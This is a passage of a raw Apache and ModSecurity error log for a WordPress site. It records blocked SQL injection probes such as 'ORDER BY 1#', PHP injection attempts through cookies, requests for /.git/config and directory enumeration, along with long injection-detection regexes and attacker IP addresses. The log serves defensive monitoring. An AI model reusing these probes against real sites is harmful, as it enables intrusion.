"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNAySCXpUXSc3dPnIVGgAAAIo"] [Sun Aug 18 00:56:20.480518 2024] [:error] [pid 25551:tid 140111027074816] [client 92.51.2.78:32848] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBCSCXpUXSc3dPnIVGwAAAIs"] [Sun Aug 18 00:56:20.998233 2024] [:error] [pid 25549:tid 140111027074816] [client 92.51.2.78:32850] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBJVyS4wZaDPTA77mUwAAAAs"] [Sun Aug 18 00:56:21.475420 2024] [:error] [pid 26175:tid 140110943147776] [client 92.51.2.78:32852] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBUusHEVNaz1QkYN6pwAAANU"] [Sun Aug 18 00:56:22.054096 2024] [:error] [pid 25549:tid 140110985111296] [client 92.51.2.78:32854] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBpVyS4wZaDPTA77mVAAAABA"] [Sun Aug 18 00:56:22.616949 2024] [:error] [pid 25551:tid 140111001896704] [client 92.51.2.78:32856] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBiSCXpUXSc3dPnIVHAAAAI4"] [Sun Aug 18 00:56:23.254927 2024] [:error] [pid 25551:tid 140110926362368] [client 92.51.2.78:32858] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBySCXpUXSc3dPnIVHQAAAJc"] [Sun Aug 18 00:56:23.797511 2024] [:error] [pid 25551:tid 140110959933184] [client 92.51.2.78:32860] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNBySCXpUXSc3dPnIVHgAAAJM"] [Sun Aug 18 00:56:24.370173 2024] [:error] [pid 26175:tid 140110968325888] [client 92.51.2.78:32862] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNCEusHEVNaz1QkYN6qAAAANI"] [Sun Aug 18 00:56:24.852829 2024] [:error] [pid 25550:tid 140110951540480] [client 92.51.2.78:32864] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNCPn89YewL24c7_QP3QAAAFQ"] [Sun Aug 18 00:56:25.478115 2024] [:error] [pid 25550:tid 140110976718592] [client 92.51.2.78:32866] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNCfn89YewL24c7_QP3gAAAFE"] [Sun Aug 18 00:56:26.238358 2024] [:error] [pid 25549:tid 140111077431040] [client 92.51.2.78:32868] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNCpVyS4wZaDPTA77mVQAAAAU"] [Sun Aug 18 00:56:26.392419 2024] [:error] [pid 25549:tid 140111060645632] [client 92.51.2.78:32870] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGNCpVyS4wZaDPTA77mVgAAAAc"] [Sun Aug 18 01:03:49.615322 2024] [autoindex:error] [pid 26175:tid 140110976718592] [client 31.220.76.145:33046] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Aug 18 12:29:19.410426 2024] [authz_core:error] [pid 13324:tid 139760634877696] [client 172.105.16.117:43672] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/18 12:29:23 [error] 12255#12255: *540547 access forbidden by rule, client: 172.105.16.117, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 18 14:05:16.216136 2024] [:error] [pid 12392:tid 139760601306880] [client 34.175.97.229:44490] [client 34.175.97.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsJF7LmPdNSB5e-E7cPuQQAAABg"], referer: www.google.com [Sun Aug 18 14:05:25.742045 2024] [:error] [pid 12392:tid 139760668448512] [client 34.175.97.229:44492] [client 34.175.97.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsJF9bmPdNSB5e-E7cPuQgAAABA"], referer: www.google.com [Sun Aug 18 14:39:41.869104 2024] [authz_core:error] [pid 12394:tid 139760626484992] [client 209.38.208.202:44770] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/18 14:39:47 [error] 12254#12254: *541222 access forbidden by rule, client: 209.38.208.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Aug 18 23:48:51.872037 2024] [autoindex:error] [pid 13324:tid 139760676841216] [client 45.61.51.73:51644] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 19 03:35:38.056322 2024] [autoindex:error] [pid 1935:tid 140153999382272] [client 45.61.51.73:54642] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 00:00:26.406349 2024] [autoindex:error] [pid 1222:tid 140153999382272] [client 20.244.89.149:45158] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 00:00:36.825256 2024] [autoindex:error] [pid 1935:tid 140153909671680] [client 20.244.89.149:45164] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:21:48.016668 2024] [:error] [pid 22695:tid 139939039389440] [client 193.176.211.213:36336] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Tue Aug 20 08:21:56.943285 2024] [:error] [pid 20537:tid 139938825697024] [client 193.176.211.213:36350] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Aug 20 08:23:44.992675 2024] [autoindex:error] [pid 22760:tid 139939064567552] [client 193.176.211.149:36496] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-site/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:45.292369 2024] [autoindex:error] [pid 22695:tid 139938909624064] [client 193.176.211.149:36498] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:45.601334 2024] [autoindex:error] [pid 22695:tid 139938959980288] [client 193.176.211.149:36500] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:46.292690 2024] [autoindex:error] [pid 20536:tid 139938943194880] [client 193.176.211.149:36502] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:49.982706 2024] [autoindex:error] [pid 22695:tid 139939064567552] [client 193.176.211.149:36508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:50.286308 2024] [autoindex:error] [pid 20536:tid 139939089745664] [client 193.176.211.149:36510] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:51.343954 2024] [autoindex:error] [pid 22760:tid 139938817304320] [client 193.176.211.149:36512] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:52.066459 2024] [autoindex:error] [pid 22760:tid 139938959980288] [client 193.176.211.149:36514] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:57.501378 2024] [autoindex:error] [pid 20535:tid 139939039389440] [client 193.176.211.149:36526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:57.801634 2024] [autoindex:error] [pid 20535:tid 139939064567552] [client 193.176.211.149:36528] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:58.413510 2024] [autoindex:error] [pid 20535:tid 139938850875136] [client 193.176.211.149:36530] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:58.708585 2024] [autoindex:error] [pid 20536:tid 139938842482432] [client 193.176.211.149:36532] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:59.005990 2024] [autoindex:error] [pid 20536:tid 139938834089728] [client 193.176.211.149:36534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:23:59.672569 2024] [autoindex:error] [pid 20535:tid 139938951587584] [client 193.176.211.149:36536] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:24:00.728759 2024] [autoindex:error] [pid 20536:tid 139938918016768] [client 193.176.211.149:36542] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:24:01.032085 2024] [autoindex:error] [pid 22760:tid 139938876053248] [client 193.176.211.149:36544] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Aug 20 08:26:41.664196 2024] [authz_core:error] [pid 20535:tid 139938842482432] [client 159.89.174.87:36590] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/20 08:26:48 [error] 20504#20504: *567344 access forbidden by rule, client: 159.89.174.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 20 09:05:48.480764 2024] [authz_core:error] [pid 22760:tid 139939081352960] [client 167.71.81.114:37268] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/20 09:05:53 [error] 20504#20504: *567703 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Aug 20 13:47:22.100293 2024] [:error] [pid 20536:tid 139938825697024] [client 45.227.254.34:43052] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/db-cache.php"] [unique_id "ZsTkul8tBPer3JkbIZLLaQAAAFc"] [Tue Aug 20 17:02:20.441291 2024] [:error] [pid 20536:tid 139938934802176] [client 144.126.136.157:47144] [client 144.126.136.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZsUSbF8tBPer3JkbIZLM1QAAAEo"], referer: 